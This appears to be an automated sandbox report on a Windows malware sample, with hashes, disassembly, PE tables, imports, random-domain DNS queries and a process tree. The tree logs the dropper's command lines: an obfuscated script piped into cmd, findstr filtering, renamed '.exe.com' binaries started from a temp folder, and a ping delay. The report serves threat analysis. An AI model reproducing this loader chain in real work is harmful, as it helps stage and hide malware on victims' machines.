                                SSDEEP:196608:vAa0g6X40mv/pyNQcRqZ9v5nQb00k0C2onRjRkZ7P2dLehT4C:v6isNFkBQwjd2eRjM2KT4C
                                TLSH:899623D72931A078CC46D9B4389C4A76D337EB84C28F33CA337056661C7A255AD68FDA
                                File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L......V............................?.............@..................................................................................0...u.................
                                Icon Hash:2b2b2b2bc469134e
                                Entrypoint:0x41883f
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:
                                Time Stamp:0x56B8F009 [Mon Feb 8 19:44:09 2016 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:650ed02ca4b6baad6b24f20402b6268b
                                Instruction
                                push ebp
                                mov ebp, esp
                                push FFFFFFFFh
                                push 0041C6A0h
                                push 004189D0h
                                mov eax, dword ptr fs:[00000000h]
                                push eax
                                mov dword ptr fs:[00000000h], esp
                                sub esp, 68h
                                push ebx
                                push esi
                                push edi
                                mov dword ptr [ebp-18h], esp
                                xor ebx, ebx
                                mov dword ptr [ebp-04h], ebx
                                push 00000002h
                                call dword ptr [0041A1E4h]
                                pop ecx
                                or dword ptr [00422A88h], FFFFFFFFh
                                or dword ptr [00422A8Ch], FFFFFFFFh
                                call dword ptr [0041A1E8h]
                                mov ecx, dword ptr [00420A74h]
                                mov dword ptr [eax], ecx
                                call dword ptr [0041A1ECh]
                                mov ecx, dword ptr [00420A70h]
                                mov dword ptr [eax], ecx
                                mov eax, dword ptr [0041A1F0h]
                                mov eax, dword ptr [eax]
                                mov dword ptr [00422A84h], eax
                                call 00007F7688C90062h
                                cmp dword ptr [0041E6A0h], ebx
                                jne 00007F7688C8FF4Eh
                                push 004189C8h
                                call dword ptr [0041A1F4h]
                                pop ecx
                                call 00007F7688C90034h
                                push 0041E068h
                                push 0041E064h
                                call 00007F7688C9001Fh
                                mov eax, dword ptr [00420A6Ch]
                                mov dword ptr [ebp-6Ch], eax
                                lea eax, dword ptr [ebp-6Ch]
                                push eax
                                push dword ptr [00420A68h]
                                lea eax, dword ptr [ebp-64h]
                                push eax
                                lea eax, dword ptr [ebp-70h]
                                push eax
                                lea eax, dword ptr [ebp-60h]
                                push eax
                                call dword ptr [0041A1FCh]
                                push 0041E060h
                                push 0041E000h
                                call 00007F7688C8FFECh
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1cacc | 0xc8 | .rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x23000 | 0xc75a0 | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x1a000 | 0x384 | .rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x1000 | 0x181aa | 0x18200 | b1409dd4b532861bfc867262e1487da9 | False | 0.5987694300518135 | data | 6.681336648046548 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata | 0x1a000 | 0x3d76 | 0x3e00 | 0241c5b58fde24391bd915d012102084 | False | 0.46213457661290325 | DOS executable (COM, 0x8C-variant) | 5.764905469559544 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data | 0x1e000 | 0x4a90 | 0x800 | ec6e65fd2a2541d624ba3966eb98f291 | False | 0.4033203125 | data | 3.529989171404316 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc | 0x23000 | 0xc75a0 | 0xc7600 | 2470a75253077d2c139c46a214cf3465 | False | 0.7342451998432602 | data | 7.467674937095469 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                RT_ICON | 0x234a8 | 0x3714 | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | English | United States | 0.8552482269503546
                                RT_ICON | 0x26bbc | 0x1b09 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9270336656552521
                                RT_ICON | 0x286c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.040133680350171536
                                RT_ICON | 0x38ef0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.05271179314694135
                                RT_ICON | 0x42398 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.06682070240295748
                                RT_ICON | 0x47820 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.060108644307982996
                                RT_ICON | 0x4ba48 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.09190871369294606
                                RT_ICON | 0x4dff0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.10717636022514071
                                RT_ICON | 0x4f098 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.17991803278688526
                                RT_ICON | 0x4fa20 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2322695035460993
                                RT_STRING | 0x4fe88 | 0x4a8 | data | English | United States | 0.3221476510067114
                                RT_STRING | 0x50330 | 0x438 | data | English | United States | 0.3731481481481482
                                RT_STRING | 0x50768 | 0x26 | Matlab v4 mat-file (little endian) ., numeric, rows 0, columns 0 | English | United States | 0.5263157894736842
                                RT_STRING | 0x50790 | 0xae | data | English | United States | 0.6724137931034483
                                RT_STRING | 0x50840 | 0x2f2 | data | English | United States | 0.35543766578249336
                                RT_STRING | 0x50b34 | 0x3a | data | English | United States | 0.6896551724137931
                                RT_STRING | 0x50b70 | 0x192 | data | English | United States | 1.027363184079602
                                RT_STRING | 0x50d04 | 0x3a8 | data | English | United States | 0.37393162393162394
                                RT_STRING | 0x510ac | 0x2ce | data | English | United States | 0.42618384401114207
                                RT_RCDATA | 0x5137c | 0x98eca | data | English | United States | 0.9082726404822647
                                RT_GROUP_ICON | 0xea248 | 0x92 | data | English | United States | 0.7054794520547946
                                RT_MANIFEST | 0xea2dc | 0x2c3 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5035360678925035
                                DLL | Import
                                COMCTL32.dll |
                                SHELL32.dll | SHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
                                GDI32.dll | CreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
                                ADVAPI32.dll | FreeSid, AllocateAndInitializeSid, CheckTokenMembership
                                USER32.dll | CreateWindowExW, GetWindowLongW, GetMessageW, DispatchMessageW, KillTimer, ScreenToClient, CharUpperW, SendMessageW, EndDialog, wsprintfW, MessageBoxW, GetWindowRect, GetParent, CopyImage, ReleaseDC, GetWindowDC, SetWindowPos, DestroyWindow, GetClassNameA, wsprintfA, GetWindowTextW, GetWindowTextLengthW, SetWindowTextW, GetSysColor, MessageBoxA, GetKeyState, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, CreateWindowExA, wvsprintfW, GetMenu, SetTimer
                                ole32.dll | CreateStreamOnHGlobal, CoCreateInstance, CoInitialize
                                OLEAUT32.dll | SysAllocStringLen, VariantClear, SysFreeString, OleLoadPicture, SysAllocString
                                KERNEL32.dll | SetFileTime, SetEndOfFile, GetFileInformationByHandle, VirtualFree, GetModuleHandleA, WaitForMultipleObjects, VirtualAlloc, ReadFile, SetFilePointer, GetFileSize, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, SuspendThread, TerminateThread, GetSystemDirectoryW, GetCurrentThreadId, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, SetEnvironmentVariableW, GetTempPathW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, LoadLibraryA, SetThreadLocale, lstrlenW, GetSystemTimeAsFileTime, ExpandEnvironmentStringsW, CompareFileTime, WideCharToMultiByte, FindFirstFileW, lstrcmpW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, GetEnvironmentVariableW, lstrcmpiW, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, GetProcAddress, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, lstrlenA, WriteFile, GetStdHandle, GetModuleHandleW, GetStartupInfoA
                                MSVCRT.dll | _purecall, memcmp, ??2@YAPAXI@Z, memmove, memcpy, _wtol, strncpy, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, malloc, free, wcsstr, _CxxThrowException, wcscmp, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, wcsncpy, ??3@YAXPAX@Z
                                Language of compilation system | Country where language is spoken | Map
                                English | United States |
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Feb 9, 2025 07:59:07.476855993 CET | 50944 | 53 | 192.168.2.4 | 1.1.1.1
                                Feb 9, 2025 07:59:07.487382889 CET | 53 | 50944 | 1.1.1.1 | 192.168.2.4
                                Feb 9, 2025 07:59:07.555464029 CET | 55789 | 53 | 192.168.2.4 | 1.1.1.1
                                Feb 9, 2025 07:59:07.564788103 CET | 53 | 55789 | 1.1.1.1 | 192.168.2.4
                                Feb 9, 2025 07:59:09.391690016 CET | 56722 | 53 | 192.168.2.4 | 1.1.1.1
                                Feb 9, 2025 07:59:09.400002956 CET | 53 | 56722 | 1.1.1.1 | 192.168.2.4
                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                Feb 9, 2025 07:59:07.476855993 CET | 192.168.2.4 | 1.1.1.1 | 0x6591 | Standard query (0) | OEEMOUIIEJHDT.OEEMOUIIEJHDT | A (IP address) | IN (0x0001) | false
                                Feb 9, 2025 07:59:07.555464029 CET | 192.168.2.4 | 1.1.1.1 | 0xe0b | Standard query (0) | NiXfPuxauHolCHyB.NiXfPuxauHolCHyB | A (IP address) | IN (0x0001) | false
                                Feb 9, 2025 07:59:09.391690016 CET | 192.168.2.4 | 1.1.1.1 | 0x9d76 | Standard query (0) | OreSqbuLLIH.OreSqbuLLIH | A (IP address) | IN (0x0001) | false
                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                Feb 9, 2025 07:59:07.487382889 CET | 1.1.1.1 | 192.168.2.4 | 0x6591 | Name error (3) | OEEMOUIIEJHDT.OEEMOUIIEJHDT | none | none | A (IP address) | IN (0x0001) | false
                                Feb 9, 2025 07:59:07.564788103 CET | 1.1.1.1 | 192.168.2.4 | 0xe0b | Name error (3) | NiXfPuxauHolCHyB.NiXfPuxauHolCHyB | none | none | A (IP address) | IN (0x0001) | false
                                Feb 9, 2025 07:59:09.400002956 CET | 1.1.1.1 | 192.168.2.4 | 0x9d76 | Name error (3) | OreSqbuLLIH.OreSqbuLLIH | none | none | A (IP address) | IN (0x0001) | false

                                Target ID:0
                                Start time:01:59:04
                                Start date:09/02/2025
                                Path:C:\Users\user\Desktop\Tt843YGUx5.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Tt843YGUx5.exe"
                                Imagebase:0x400000
                                File size:9'326'758 bytes
                                MD5 hash:0D6BBE5907CA581FEC7C452793AA1257
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:1
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\cmd.exe" /c cmd < Seminato.vstm
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:cmd
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Windows\SysWOW64\findstr.exe
                                Wow64 process (32bit):true
                                Commandline:findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
                                Imagebase:0x1a0000
                                File size:29'696 bytes
                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com
                                Wow64 process (32bit):true
                                Commandline:Inebriarti.exe.com A
                                Imagebase:0x760000
                                File size:893'608 bytes
                                MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 3%, ReversingLabs
                                Reputation:high
                                Has exited:true

                                Target ID:6
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Windows\SysWOW64\findstr.exe
                                Wow64 process (32bit):true
                                Commandline:findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
                                Imagebase:0x1a0000
                                File size:29'696 bytes
                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:7
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com
                                Wow64 process (32bit):true
                                Commandline:Bonta.exe.com m
                                Imagebase:0xa50000
                                File size:893'608 bytes
                                MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 3%, ReversingLabs
                                Reputation:high
                                Has exited:true

                                Target ID:8
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com A
                                Imagebase:0x760000
                                File size:893'608 bytes
                                MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:9
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Windows\SysWOW64\findstr.exe
                                Wow64 process (32bit):true
                                Commandline:findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
                                Imagebase:0x1a0000
                                File size:29'696 bytes
                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:10
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com m
                                Imagebase:0xa50000
                                File size:893'608 bytes
                                MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:11
                                Start time:01:59:06
                                Start date:09/02/2025
                                Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com
                                Wow64 process (32bit):true
                                Commandline:Pensiero.exe.com E
                                Imagebase:0x3d0000
                                File size:893'608 bytes
                                MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 3%, ReversingLabs
                                Has exited:true

                                Target ID:12
                                Start time:01:59:06
                                Start date:09/02/2025
                                Path:C:\Windows\SysWOW64\PING.EXE
                                Wow64 process (32bit):true
                                Commandline:ping 127.0.0.1 -n 30
                                Imagebase:0x670000
                                File size:18'944 bytes
                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:13
                                Start time:01:59:07
                                Start date:09/02/2025
                                Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com E
                                Imagebase:0x3d0000
                                File size:893'608 bytes
                                MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false
